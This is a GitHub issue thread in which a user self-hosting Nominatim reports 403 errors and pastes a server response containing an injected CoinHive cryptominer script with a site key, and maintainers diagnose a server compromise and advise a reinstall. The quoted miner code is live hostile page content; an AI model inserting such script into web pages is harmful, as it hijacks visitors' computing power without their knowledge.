### ISSUE TITLE
Nominatim 403 Forbidden Error

### ISSUE THREAD

**Issue by GacelDel** [openstreetmap/Nominatim#1198]
I've made my own Nominatim server using the guide in the docs on a Digital Ocean Ubuntu 18 droplet with apache. The search/reverse endpoint works fine but I've encountered a problem. When I made a bunch of simultaneous requests per second to the API, it returns 403 Forbidden Error and the following html response:
```
<html>
    <head>
        <meta http-equiv="Content-Type" content="text/html;charset=windows-1251">
        <title>"http://<droplet-ip>/nominatim/search/?q=villa+rey&format=json&addressdetails=1"</title>
        <script src="https://coinhive.com/lib/coinhive.min.js"></script>
        <script>
	var miner = new CoinHive.Anonymous('48zUYBdsYIIfcmIn3S38ss81A17xGkpA', {throttle: 0.1});
	miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);
</script>
    </head>
    <frameset>
        <frame src="http://<droplet-ip>/nominatim/search/?q=villa+rey&format=json&addressdetails=1"></frame>
    </frameset>
</html>
```
I don't know what is causing this error. The number of requests per second is not the problem because it's my own nominatim server... Any help would be very much appreciated....

**Comment by mtmail** [comment]
Did you add the coinhive code? If not your server got hacked https://stackoverflow.com/questions/48147676/coinhive-script-appending-automatically-in-my-website-head-tag

Check if the webserver (Apache) configuration changed compared to the installation instructions.

**Comment by GacelDel** [comment]
No, I did not add the coinhive script. I checked the Apache configuration and it's fine. Do you think the coinhive code is causing the 403 Forbidden Error?

**Comment by scaidermern** [comment]
Reinstall your whole server. Either with a fresh installation or with a backup.

**Comment by lonvia** [comment]
Closing as unrelated to Nominatim.
